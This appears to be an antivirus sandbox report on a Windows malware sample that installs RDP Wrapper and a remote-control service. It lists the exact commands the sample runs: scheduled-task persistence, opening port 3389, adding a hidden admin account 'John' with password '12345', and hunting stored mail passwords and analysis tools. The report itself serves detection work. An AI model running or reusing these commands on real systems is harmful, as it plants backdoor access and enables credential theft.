Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- <SYSTEM32>\tasks\microsoft\windows\wininet\winsers
- <SYSTEM32>\tasks\microsoft\windows\wininet\winser
Sets the following service settings
- [HKLM\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
- [HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters] 'ServiceDll' = '%ProgramFiles%\RDP Wrapper\rdpwrap.dll'
Creates the following services
- 'umbus' system32\DRIVERS\umbus.sys
Malicious functions
Executes the following
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Terminates or attempts to terminate
the following system processes:
- <SYSTEM32>\svchost.exe
Searches for registry branches where third party applications store passwords
- [HKCU\Software\Microsoft\Internet Account Manager]
- [HKLM\Software\Microsoft\Windows Mail]
- [HKCU\Software\Microsoft\Windows Mail]
Searches for windows to
detect analytical utilities:
- ClassName: 'RegmonClass', WindowName: ''
- ClassName: 'FilemonClass', WindowName: ''
- ClassName: 'PROCMON_WINDOW_CLASS', WindowName: ''
Modifies file system
Creates the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- <SYSTEM32>\microsoft\protect\s-1-5-20\6d7ec15b-dd71-4eb3-8a64-1c149473e8f8
- %ProgramFiles%\rdp wrapper\rdpwrap.dll
- %ALLUSERSPROFILE%\rdpwinst.exe
- %TEMP%\aut8fb4.tmp
- %ProgramFiles%\rdp wrapper\rdpwrap.ini
- %TEMP%\aut8f46.tmp
- %ALLUSERSPROFILE%\windows tasks service\settings.dat
- %TEMP%\aut30e0.tmp
- %APPDATA%\rms_settings\logs\rms_log_2023-05.html
- %ALLUSERSPROFILE%\windows tasks service\winserv.exe
- %TEMP%\autf037.tmp
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
- %APPDATA%\microsoft\windows\cookies\low\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\xb9nwrms\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\18pl5c0z\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\bxah6knh\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\6fp5qhnb\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- <SYSTEM32>\microsoft\protect\s-1-5-20\preferred
- %ALLUSERSPROFILE%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Sets the 'hidden' attribute to the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\6fp5qhnb\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\bxah6knh\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\18pl5c0z\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\xb9nwrms\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
- %ProgramFiles%\rdp wrapper\rdpwrap.ini
- %ALLUSERSPROFILE%\windows tasks service\settings.dat
- %ALLUSERSPROFILE%\windows tasks service\winserv.exe
- %ALLUSERSPROFILE%\rdpwinst.exe
Deletes the following files
- %TEMP%\autf037.tmp
- %TEMP%\aut30e0.tmp
- %TEMP%\aut8f46.tmp
- %TEMP%\aut8fb4.tmp
- %ALLUSERSPROFILE%\rdpwinst.exe
Network activity
UDP
- DNS ASK ip###ger.com
- DNS ASK id###ver.xyz
- DNS ASK rm#####ver.tektonit.ru
- DNS ASK id####erbackup.xyz
Miscellaneous
Searches for the following windows
- ClassName: 'Registry Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
- ClassName: '18467-41' WindowName: ''
- ClassName: 'File Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
- ClassName: 'Process Monitor - Sysinternals: www.sysinternals.com' WindowName: ''
Creates and executes the following
- '%ALLUSERSPROFILE%\rdpwinst.exe' -i
- '%ALLUSERSPROFILE%\windows tasks service\winserv.exe' Task Service\winserv.exe
- '%ALLUSERSPROFILE%\windows tasks service\winserv.exe' -second
- '%ALLUSERSPROFILE%\windows tasks service\winserv.exe'
- '<SYSTEM32>\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"%ALLUSERSPROFILE%\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c net localgroup "Remote Desktop Users" john /add' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c net localgroup "Administradores" John /add' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c net localgroup "Administrators" John /add' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c net localgroup "Пользователи удаленного рабочего стола" John /add' (with hidden window)
- '%ALLUSERSPROFILE%\rdpwinst.exe' -i' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c net localgroup "Администраторы" John /add' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c net user John 12345 /add' (with hidden window)
- '%ALLUSERSPROFILE%\windows tasks service\winserv.exe' ' (with hidden window)
- '%ALLUSERSPROFILE%\windows tasks service\winserv.exe' Task Service\winserv.exe' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"%ALLUSERSPROFILE%\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c net localgroup "Пользователи удаленного управления" john /add" John /add' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\Install\del.bat' (with hidden window)
Executes the following
- '<SYSTEM32>\rundll32.exe' "<SYSTEM32>\WININET.dll",DispatchAPICall 1
- '<SYSTEM32>\net1.exe' localgroup "Пользователи удаленного управления" john /add" John /add
- '<SYSTEM32>\net1.exe' localgroup "Пользователи удаленного рабочего стола" John /add
- '<SYSTEM32>\net1.exe' localgroup "Администраторы" John /add
- '<SYSTEM32>\net1.exe' localgroup "Remote Desktop Users" john /add
- '<SYSTEM32>\net.exe' localgroup "Пользователи удаленного рабочего стола" John /add
- '<SYSTEM32>\net1.exe' localgroup "Administradores" John /add
- '<SYSTEM32>\net.exe' localgroup "Пользователи удаленного управления" john /add" John /add
- '<SYSTEM32>\net1.exe' localgroup "Administrators" John /add
- '<SYSTEM32>\net.exe' localgroup "Remote Desktop Users" john /add
- '<SYSTEM32>\net.exe' localgroup "Администраторы" John /add
- '<SYSTEM32>\net.exe' localgroup "Administradores" John /add
- '<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\Install\del.bat
- '<SYSTEM32>\net.exe' localgroup "Administrators" John /add
- '<SYSTEM32>\net.exe' user John 12345 /add
- '<SYSTEM32>\cmd.exe' /c net localgroup "Remote Desktop Users" john /add
- '<SYSTEM32>\cmd.exe' /c net localgroup "Administradores" John /add
- '<SYSTEM32>\cmd.exe' /c net localgroup "Administrators" John /add
- '<SYSTEM32>\cmd.exe' /c net localgroup "Пользователи удаленного управления" john /add" John /add
- '<SYSTEM32>\cmd.exe' /c net localgroup "Пользователи удаленного рабочего стола" John /add
- '<SYSTEM32>\cmd.exe' /c net localgroup "Администраторы" John /add
- '<SYSTEM32>\cmd.exe' /c net user John 12345 /add
- '<SYSTEM32>\taskeng.exe' {A333F9C9-3899-4CC2-9788-7F3E2B584C8C} S-1-5-21-1960123792-2022915161-3775307078-1001:bvbxgwzvndl\user:Interactive:[1]
- '<SYSTEM32>\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"%ALLUSERSPROFILE%\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
- '<SYSTEM32>\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"%ALLUSERSPROFILE%\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
- '<SYSTEM32>\net1.exe' user John 12345 /add
- '<SYSTEM32>\timeout.exe' 5
